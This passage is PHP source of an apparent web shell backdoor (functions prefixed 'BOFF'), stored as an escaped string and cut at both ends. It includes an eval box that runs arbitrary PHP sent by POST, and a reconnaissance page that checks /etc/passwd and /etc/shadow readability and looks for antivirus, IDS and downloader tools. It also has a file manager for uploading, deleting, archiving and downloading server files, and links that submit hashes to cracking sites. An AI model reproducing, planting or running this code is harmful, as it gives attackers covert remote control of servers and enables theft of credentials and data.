.= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\n\treturn \$i;\r\n}\r\n\r\nfunction BOFFPermsColor(\$f) {\r\n\tif (!@is_readable(\$f))\r\n\t\treturn '<font color=#FF0000>' . BOFFPerms(@fileperms(\$f)) . '</font>';\r\n\telseif (!@is_writable(\$f))\r\n\t\treturn '<font color=white>' . BOFFPerms(@fileperms(\$f)) . '</font>';\r\n\telse\r\n\t\treturn '<font color=#25ff00>' . BOFFPerms(@fileperms(\$f)) . '</font>';\r\n}\r\n\r\nif(!function_exists(\"scandir\")) {\r\n\tfunction scandir(\$dir) {\r\n\t\t\$dh = opendir(\$dir);\r\n\t\twhile (false !== (\$filename = readdir(\$dh)))\r\n \t\t\$files[] = \$filename;\r\n\t\treturn \$files;\r\n\t}\r\n}\r\n\r\nfunction BOFFWhich(\$p) {\r\n\t\$path = BOFFEx('which ' . \$p);\r\n\tif(!empty(\$path))\r\n\t\treturn \$path;\r\n\treturn false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n\tBOFFHeader();\r\n\techo '<h1>Server security information</h1><div class=content>';\r\n\tfunction BOFFSecParam(\$n, \$v) {\r\n\t\t\$v = trim(\$v);\r\n\t\tif(\$v) {\r\n\t\t\techo '<span>' . \$n . ': </span>';\r\n\t\t\tif(strpos(\$v, \"\\n\") === false)\r\n\t\t\t\techo \$v . '<br>';\r\n\t\t\telse\r\n\t\t\t\techo '<pre class=ml1>' . \$v . '</pre>';\r\n\t\t}\r\n\t}\r\n\t\r\n\tBOFFSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\n if(function_exists('apache_get_modules'))\r\n BOFFSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));\r\n\tBOFFSecParam('Disabled PHP Functions', \$GLOBALS['disable_functions']?\$GLOBALS['disable_functions']:'none');\r\n\tBOFFSecParam('Open base dir', @ini_get('open_basedir'));\r\n\tBOFFSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\n\tBOFFSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\n\tBOFFSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n\t\$temp=array();\r\n\tif(function_exists('mysql_get_client_info'))\r\n\t\t\$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n\tif(function_exists('mssql_connect'))\r\n\t\t\$temp[] = \"MSSQL\";\r\n\tif(function_exists('pg_connect'))\r\n\t\t\$temp[] = \"PostgreSQL\";\r\n\tif(function_exists('oci_connect'))\r\n\t\t\$temp[] = \"Oracle\";\r\n\tBOFFSecParam('Supported databases', implode(', ', \$temp));\r\n\techo '<br>';\r\n\t\r\n\tif(\$GLOBALS['os'] == 'nix') {\r\n\t\tBOFFSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\n\t\tBOFFSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"etc\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\n\t\tBOFFSecParam('OS version', @file_get_contents('/proc/version'));\r\n\t\tBOFFSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\n\t\tif(!\$GLOBALS['safe_mode']) {\r\n \$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n \$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n \$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\n\t\t\techo '<br>';\r\n\t\t\t\$temp=array();\r\n\t\t\tforeach (\$userful as \$item)\r\n\t\t\t\tif(BOFFWhich(\$item))\r\n \$temp[] = \$item;\r\n\t\t\tBOFFSecParam('Userful', implode(', ',\$temp));\r\n\t\t\t\$temp=array();\r\n\t\t\tforeach (\$danger as \$item)\r\n\t\t\t\tif(BOFFWhich(\$item))\r\n \$temp[] = \$item;\r\n\t\t\tBOFFSecParam('Danger', implode(', ',\$temp));\r\n\t\t\t\$temp=array();\r\n\t\t\tforeach (\$downloaders as \$item) \r\n\t\t\t\tif(BOFFWhich(\$item))\r\n \$temp[] = \$item;\r\n\t\t\tBOFFSecParam('Downloaders', implode(', ',\$temp));\r\n\t\t\techo '<br/>';\r\n BOFFSecParam('HDD space', BOFFEx('df -h'));\r\n\t\t\tBOFFSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\n\t\t}\r\n\t} else {\r\n\t\tBOFFSecParam('OS Version',BOFFEx('ver'));\r\n\t\tBOFFSecParam('Account Settings',BOFFEx('net accounts'));\r\n\t\tBOFFSecParam('User Accounts',BOFFEx('net user'));\r\n\t}\r\n\techo '</div>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionPhp() {\r\n\tif(isset(\$_POST['ajax'])) {\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']) . 'ajax'] = true;\r\n\t\tob_start();\r\n\t\teval(\$_POST['p1']);\r\n\t\t\$temp = \"document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='\" . addcslashes(htmlspecialchars(ob_get_clean()), \"\\n\\r\\t\\\\'\\0\") . \"';\\n\";\r\n\t\techo strlen(\$temp), \"\\n\", \$temp;\r\n\t\texit; \r\n\t}\r\n\tBOFFHeader();\r\n\tif(isset(\$_POST['p2']) && (\$_POST['p2'] == 'info')) {\r\n\t\techo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>';\r\n\t\tob_start();\r\n\t\tphpinfo();\r\n\t\t\$tmp = ob_get_clean();\r\n \$tmp = preg_replace('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU','',\$tmp);\r\n\t\t\$tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {\$1}',\$tmp);\r\n\t\techo str_replace('<h1','<h2', \$tmp) .'</div><br>';\r\n\t}\r\n\tif(empty(\$_POST['ajax']) && !empty(\$_POST['p1']))\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']) . 'ajax'] = false;\r\n echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(\\'Php\\',null,this.code.value);}else{g(\\'Php\\',null,this.code.value,\\'\\');}return false;\"><textarea name=code class=bigarea id=PhpCode>'.(!empty(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'</textarea><input type=submit value=Eval style=\"margin-top:5px\">';\r\n\techo ' <input type=checkbox name=ajax value=1 '.(\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style=\"'.(empty(\$_POST['p1'])?'display:none;':'').'margin-top:5px;\" class=ml1>';\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tob_start();\r\n\t\teval(\$_POST['p1']);\r\n\t\techo htmlspecialchars(ob_get_clean());\r\n\t}\r\n\techo '</pre></div>';\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesMan() {\r\n\tBOFFHeader();\r\n\techo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>';\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tswitch(\$_POST['p1']) {\r\n\t\t\tcase 'uploadFile':\r\n\t\t\t\tif(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name']))\r\n\t\t\t\t\techo \"Can't upload file!\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'mkdir':\r\n\t\t\t\tif(!@mkdir(\$_POST['p2']))\r\n\t\t\t\t\techo \"Can't create new dir\";\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'delete':\r\n\t\t\t\tfunction deleteDir(\$path) {\r\n\t\t\t\t\t\$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n\t\t\t\t\t\$dh = opendir(\$path);\r\n\t\t\t\t\twhile ( (\$item = readdir(\$dh) ) !== false) {\r\n\t\t\t\t\t\t\$item = \$path.\$item;\r\n\t\t\t\t\t\tif ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") )\r\n\t\t\t\t\t\t\tcontinue;\r\n\t\t\t\t\t\t\$type = filetype(\$item);\r\n\t\t\t\t\t\tif (\$type == \"dir\")\r\n\t\t\t\t\t\t\tdeleteDir(\$item);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink(\$item);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tclosedir(\$dh);\r\n\t\t\t\t\t@rmdir(\$path);\r\n\t\t\t\t}\r\n\t\t\t\tif(is_array(@\$_POST['f']))\r\n\t\t\t\t\tforeach(\$_POST['f'] as \$f) {\r\n if(\$f == '..')\r\n continue;\r\n\t\t\t\t\t\t\$f = urldecode(\$f);\r\n\t\t\t\t\t\tif(is_dir(\$f))\r\n\t\t\t\t\t\t\tdeleteDir(\$f);\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t@unlink(\$f);\r\n\t\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t\tcase 'paste':\r\n\t\t\t\tif(\$_SESSION['act'] == 'copy') {\r\n\t\t\t\t\tfunction copy_paste(\$c,\$s,\$d){\r\n\t\t\t\t\t\tif(is_dir(\$c.\$s)){\r\n\t\t\t\t\t\t\tmkdir(\$d.\$s);\r\n\t\t\t\t\t\t\t\$h = @opendir(\$c.\$s);\r\n\t\t\t\t\t\t\twhile ((\$f = @readdir(\$h)) !== false)\r\n\t\t\t\t\t\t\t\tif ((\$f != \".\") and (\$f != \"..\"))\r\n\t\t\t\t\t\t\t\t\tcopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n\t\t\t\t\t\t} elseif(is_file(\$c.\$s))\r\n\t\t\t\t\t\t\t@copy(\$c.\$s, \$d.\$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach(\$_SESSION['f'] as \$f)\r\n\t\t\t\t\t\tcopy_paste(\$_SESSION['c'],\$f, \$GLOBALS['cwd']);\t\t\t\t\t\r\n\t\t\t\t} elseif(\$_SESSION['act'] == 'move') {\r\n\t\t\t\t\tfunction move_paste(\$c,\$s,\$d){\r\n\t\t\t\t\t\tif(is_dir(\$c.\$s)){\r\n\t\t\t\t\t\t\tmkdir(\$d.\$s);\r\n\t\t\t\t\t\t\t\$h = @opendir(\$c.\$s);\r\n\t\t\t\t\t\t\twhile ((\$f = @readdir(\$h)) !== false)\r\n\t\t\t\t\t\t\t\tif ((\$f != \".\") and (\$f != \"..\"))\r\n\t\t\t\t\t\t\t\t\tcopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n\t\t\t\t\t\t} elseif(@is_file(\$c.\$s))\r\n\t\t\t\t\t\t\t@copy(\$c.\$s, \$d.\$s);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tforeach(\$_SESSION['f'] as \$f)\r\n\t\t\t\t\t\t@rename(\$_SESSION['c'].\$f, \$GLOBALS['cwd'].\$f);\r\n\t\t\t\t} elseif(\$_SESSION['act'] == 'zip') {\r\n\t\t\t\t\tif(class_exists('ZipArchive')) {\r\n \$zip = new ZipArchive();\r\n if (\$zip->open(\$_POST['p2'], 1)) {\r\n chdir(\$_SESSION['c']);\r\n foreach(\$_SESSION['f'] as \$f) {\r\n if(\$f == '..')\r\n continue;\r\n if(@is_file(\$_SESSION['c'].\$f))\r\n \$zip->addFile(\$_SESSION['c'].\$f, \$f);\r\n elseif(@is_dir(\$_SESSION['c'].\$f)) {\r\n \$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$f.'/'));\r\n foreach (\$iterator as \$key=>\$value) {\r\n \$zip->addFile(realpath(\$key), \$key);\r\n }\r\n }\r\n }\r\n chdir(\$GLOBALS['cwd']);\r\n \$zip->close();\r\n }\r\n }\r\n\t\t\t\t} elseif(\$_SESSION['act'] == 'unzip') {\r\n\t\t\t\t\tif(class_exists('ZipArchive')) {\r\n \$zip = new ZipArchive();\r\n foreach(\$_SESSION['f'] as \$f) {\r\n if(\$zip->open(\$_SESSION['c'].\$f)) {\r\n \$zip->extractTo(\$GLOBALS['cwd']);\r\n \$zip->close();\r\n }\r\n }\r\n }\r\n\t\t\t\t} elseif(\$_SESSION['act'] == 'tar') {\r\n chdir(\$_SESSION['c']);\r\n \$_SESSION['f'] = array_map('escapeshellarg', \$_SESSION['f']);\r\n BOFFEx('tar cfzv ' . escapeshellarg(\$_POST['p2']) . ' ' . implode(' ', \$_SESSION['f']));\r\n chdir(\$GLOBALS['cwd']);\r\n\t\t\t\t}\r\n\t\t\t\tunset(\$_SESSION['f']);\r\n\t\t\t\tbreak;\r\n\t\t\tdefault:\r\n if(!empty(\$_POST['p1'])) {\r\n\t\t\t\t\t\$_SESSION['act'] = @\$_POST['p1'];\r\n\t\t\t\t\t\$_SESSION['f'] = @\$_POST['f'];\r\n\t\t\t\t\tforeach(\$_SESSION['f'] as \$k => \$f)\r\n\t\t\t\t\t\t\$_SESSION['f'][\$k] = urldecode(\$f);\r\n\t\t\t\t\t\$_SESSION['c'] = @\$_POST['c'];\r\n\t\t\t\t}\r\n\t\t\t\tbreak;\r\n\t\t}\r\n\t}\r\n\t\$dirContent = @scandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\n\tif(\$dirContent === false) {\techo 'Can\\'t open this folder!';BOFFFooter(); return; }\r\n\tglobal \$sort;\r\n\t\$sort = array('name', 1);\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tif(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match))\r\n\t\t\t\$sort = array(\$match[1], (int)\$match[2]);\r\n\t}\r\necho \"<script>\r\n\tfunction sa() {\r\n\t\tfor(i=0;i<d.files.elements.length;i++)\r\n\t\t\tif(d.files.elements[i].type == 'checkbox')\r\n\t\t\t\td.files.elements[i].checked = d.files.elements[0].checked;\r\n\t}\r\n</script>\r\n<table width='100%' class='main' cellspacing='0' cellpadding='2'>\r\n<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n\t\$dirs = \$files = array();\r\n\t\$n = count(\$dirContent);\r\n\tfor(\$i=0;\$i<\$n;\$i++) {\r\n\t\t\$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n\t\t\$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n\t\t\$tmp = array('name' => \$dirContent[\$i],\r\n\t\t\t\t\t 'path' => \$GLOBALS['cwd'].\$dirContent[\$i],\r\n\t\t\t\t\t 'modify' => date('Y-m-d H:i:s', @filemtime(\$GLOBALS['cwd'] . \$dirContent[\$i])),\r\n\t\t\t\t\t 'perms' => BOFFPermsColor(\$GLOBALS['cwd'] . \$dirContent[\$i]),\r\n\t\t\t\t\t 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]),\r\n\t\t\t\t\t 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]),\r\n\t\t\t\t\t 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i])\r\n\t\t\t\t\t);\r\n\t\tif(@is_file(\$GLOBALS['cwd'] . \$dirContent[\$i]))\r\n\t\t\t\$files[] = array_merge(\$tmp, array('type' => 'file'));\r\n\t\telseif(@is_link(\$GLOBALS['cwd'] . \$dirContent[\$i]))\r\n\t\t\t\$dirs[] = array_merge(\$tmp, array('type' => 'link', 'link' => readlink(\$tmp['path'])));\r\n\t\telseif(@is_dir(\$GLOBALS['cwd'] . \$dirContent[\$i])&& (\$dirContent[\$i] != \".\"))\r\n\t\t\t\$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n\t}\r\n\t\$GLOBALS['sort'] = \$sort;\r\n\tfunction BOFFCmp(\$a, \$b) {\r\n\t\tif(\$GLOBALS['sort'][0] != 'size')\r\n\t\t\treturn strcmp(strtolower(\$a[\$GLOBALS['sort'][0]]), strtolower(\$b[\$GLOBALS['sort'][0]]))*(\$GLOBALS['sort'][1]?1:-1);\r\n\t\telse\r\n\t\t\treturn ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n\t}\r\n\tusort(\$files, \"BOFFCmp\");\r\n\tusort(\$dirs, \"BOFFCmp\");\r\n\t\$files = array_merge(\$dirs, \$files);\r\n\t\$l = 0;\r\n\tforeach(\$files as \$f) {\r\n\t\techo '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\" title=' . \$f['link'] . '><b>[ ' . htmlspecialchars(\$f['name']) . ' ]</b>').'</a></td><td>'.((\$f['type']=='file')?BOFFViewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms']\r\n\t\t\t.'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n\t\t\$l = \$l?0:1;\r\n\t}\r\n\techo \"<tr><td colspan=7>\r\n\t<input type=hidden name=a value='FilesMan'>\r\n\t<input type=hidden name=c value='\" . htmlspecialchars(\$GLOBALS['cwd']) .\"'>\r\n\t<input type=hidden name=charset value='\". (isset(\$_POST['charset'])?\$_POST['charset']:'').\"'>\r\n\t<select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>\";\r\n if(class_exists('ZipArchive'))\r\n echo \"<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>\";\r\n echo \"<option value='tar'>Compress (tar.gz)</option>\";\r\n if(!empty(\$_SESSION['act']) && @count(\$_SESSION['f']))\r\n echo \"<option value='paste'>Paste / Compress</option>\";\r\n echo \"</select> \";\r\n if(!empty(\$_SESSION['act']) && @count(\$_SESSION['f']) && ((\$_SESSION['act'] == 'zip') || (\$_SESSION['act'] == 'tar')))\r\n echo \"file name: <input type=text name=p2 value='BOFF_\" . date(\"Ymd_His\") . \".\" . (\$_SESSION['act'] == 'zip'?'zip':'tar.gz') . \"'> \";\r\n echo \"<input type='submit' value='>>'></td></tr></form></table></div>\";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionStringTools() {\r\n\tif(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));}}\r\n if(!function_exists('binhex')) {function binhex(\$p) {return dechex(bindec(\$p));}}\r\n\tif(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';for(\$i=0;\$i<strLen(\$p);\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));}return \$r;}}\r\n\tif(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= sprintf('%02X',ord(\$p[\$i]));return strtoupper(\$r);}}\r\n\tif(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));return strtoupper(\$r);}}\r\n\t\$stringTools = array(\r\n\t\t'Base64 encode' => 'base64_encode',\r\n\t\t'Base64 decode' => 'base64_decode',\r\n\t\t'Url encode' => 'urlencode',\r\n\t\t'Url decode' => 'urldecode',\r\n\t\t'Full urlencode' => 'full_urlencode',\r\n\t\t'md5 hash' => 'md5',\r\n\t\t'sha1 hash' => 'sha1',\r\n\t\t'crypt' => 'crypt',\r\n\t\t'CRC32' => 'crc32',\r\n\t\t'ASCII to HEX' => 'ascii2hex',\r\n\t\t'HEX to ASCII' => 'hex2ascii',\r\n\t\t'HEX to DEC' => 'hexdec',\r\n\t\t'HEX to BIN' => 'hex2bin',\r\n\t\t'DEC to HEX' => 'dechex',\r\n\t\t'DEC to BIN' => 'decbin',\r\n\t\t'BIN to HEX' => 'binhex',\r\n\t\t'BIN to DEC' => 'bindec',\r\n\t\t'String to lower case' => 'strtolower',\r\n\t\t'String to upper case' => 'strtoupper',\r\n\t\t'Htmlspecialchars' => 'htmlspecialchars',\r\n\t\t'String length' => 'strlen',\r\n\t);\r\n\tif(isset(\$_POST['ajax'])) {\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\n\t\tob_start();\r\n\t\tif(in_array(\$_POST['p1'], \$stringTools))\r\n\t\t\techo \$_POST['p1'](\$_POST['p2']);\r\n\t\t\$temp = \"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\\n\";\r\n\t\techo strlen(\$temp), \"\\n\", \$temp;\r\n\t\texit;\r\n\t}\r\n\tBOFFHeader();\r\n\techo '<h1>String conversions</h1><div class=content>';\r\n\tif(empty(\$_POST['ajax'])&&!empty(\$_POST['p1']))\r\n\t\t\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = false;\r\n\techo \"<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>\";\r\n\tforeach(\$stringTools as \$k => \$v)\r\n\t\techo \"<option value='\".htmlspecialchars(\$v).\"'>\".\$k.\"</option>\";\r\n\t\techo \"</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 \".(@\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax']?'checked':'').\"> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>\".(empty(\$_POST['p1'])?'':htmlspecialchars(@\$_POST['p2'])).\"</textarea></form><pre class='ml1' style='\".(empty(\$_POST['p1'])?'display:none;':'').\"margin-top:5px' id='strOutput'>\";\r\n\tif(!empty(\$_POST['p1'])) {\r\n\t\tif(in_array(\$_POST['p1'], \$stringTools))echo htmlspecialchars(\$_POST['p1'](\$_POST['p2']));\r\n\t}\r\n\techo\"</pre></div><br><h1>Search text in files:</h1><div class=content>\r\n\t\t<form onsubmit=\\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='\". htmlspecialchars(\$GLOBALS['cwd']) .\"' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>\";\r\n\r\n\tfunction BOFFRecursiveGlob(\$path) {\r\n\t\tif(substr(\$path, -1) != '/')\r\n\t\t\t\$path.='/';\r\n\t\t\$paths = @array_unique(@array_merge(@glob(\$path.\$_POST['p3']), @glob(\$path.'*', GLOB_ONLYDIR)));\r\n\t\tif(is_array(\$paths)&&@count(\$paths)) {\r\n\t\t\tforeach(\$paths as \$item) {\r\n\t\t\t\tif(@is_dir(\$item)){\r\n\t\t\t\t\tif(\$path!=\$item)\r\n\t\t\t\t\t\tBOFFRecursiveGlob(\$item);\r\n\t\t\t\t} else {\r\n\t\t\t\t\tif(@strpos(@file_get_contents(\$item), @\$_POST['p2'])!==false)\r\n\t\t\t\t\t\techo \"<a href='#' onclick='g(\\\"FilesTools\\\",null,\\\"\".urlencode(\$item).\"\\\", \\\"view\\\")'>\".htmlspecialchars(\$item).\"</a><br>\";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tif(@\$_POST['p3'])\r\n\t\tBOFFRecursiveGlob(\$_POST['c']);\r\n\techo \"</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n\t\t\t<input type='button' value='hashcrack.com' onclick=\\\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\\\"><br>\r\n\t\t\t<input type='button' value='milw0rm.com' onclick=\\\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\\\"><br>\r\n\t\t\t<input type='button' value='hashcracking.info' onclick=\\\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\\\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\\\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\\\"><br>\r\n\t\t\t<input type='button' value='md5decrypter.com' onclick=\\\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\\\"><br>\r\n\t\t</form></div>\";\r\n\tBOFFFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n\tif( isset(\$_POST['p1']) )\r\n\t\t\$_POST['p1'] = urldecode(\$_POST['p1']);\r\n\tif(@\$_POST['p2']=='download') {\r\n\t\tif(@is_file(\$_POST['p1']) && @is_readable(\$_POST['p1'])) {\r\n\t\t\tob_start(\"ob_gzhandler\", 4096);\r\n\t\t\theader(\"Content-Disposition: attachment; filename=\".basename(\$_POST['p1']));\r\n\t\t\tif (function_exists(\"mime_content_type\")) {\r\n\t\t\t\t\$type = @mime_content_type(\$_POST['p1']);\r\n\t\t\t\theader(\"Content-Type: \" . \$type);\r\n\t\t\t} else\r\n header(\"Content-Type: application/octet-stream\");\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], \"r\");\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile(!@feof(\$fp))\r\n\t\t\t\t\techo @fread(\$fp, 1024);\r\n\t\t\t\tfclose(\$fp);\r\n\t\t\t}\r\n\t\t}exit;\r\n\t}\r\n\tif( @\$_POST['p2'] == 'mkfile' ) {\r\n\t\tif(!file_exists(\$_POST['p1'])) {\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'w');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\t\$_POST['p2'] = \"edit\";\r\n\t\t\t\tfclose(\$fp);\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\tBOFFHeader();\r\n\techo '<h1>File tools</h1><div class=content>';\r\n\tif( !file_exists(@\$_POST['p1']) ) {\r\n\t\techo 'File not exists';\r\n\t\tBOFFFooter();\r\n\t\treturn;\r\n\t}\r\n\t\$uid = @posix_getpwuid(@fileowner(\$_POST['p1']));\r\n\tif(!\$uid) {\r\n\t\t\$uid['name'] = @fileowner(\$_POST['p1']);\r\n\t\t\$gid['name'] = @filegroup(\$_POST['p1']);\r\n\t} else \$gid = @posix_getgrgid(@filegroup(\$_POST['p1']));\r\n\techo '<span>Name:</span> '.htmlspecialchars(@basename(\$_POST['p1'])).' <span>Size:</span> '.(is_file(\$_POST['p1'])?BOFFViewSize(filesize(\$_POST['p1'])):'-').' <span>Permission:</span> '.BOFFPermsColor(\$_POST['p1']).' <span>Owner/Group:</span> '.\$uid['name'].'/'.\$gid['name'].'<br>';\r\n\techo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime(\$_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime(\$_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime(\$_POST['p1'])).'<br><br>';\r\n\tif( empty(\$_POST['p2']) )\r\n\t\t\$_POST['p2'] = 'view';\r\n\tif( is_file(\$_POST['p1']) )\r\n\t\t\$m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');\r\n\telse\r\n\t\t\$m = array('Chmod', 'Rename', 'Touch');\r\n\tforeach(\$m as \$v)\r\n\t\techo '<a href=# onclick=\"g(null,null,null,\\''.strtolower(\$v).'\\')\">'.((strtolower(\$v)==@\$_POST['p2'])?'<b>[ '.\$v.' ]</b>':\$v).'</a> ';\r\n\techo '<br><br>';\r\n\tswitch(\$_POST['p2']) {\r\n\t\tcase 'view':\r\n\t\t\techo '<pre class=ml1>';\r\n\t\t\t\$fp = @fopen(\$_POST['p1'], 'r');\r\n\t\t\tif(\$fp) {\r\n\t\t\t\twhile( 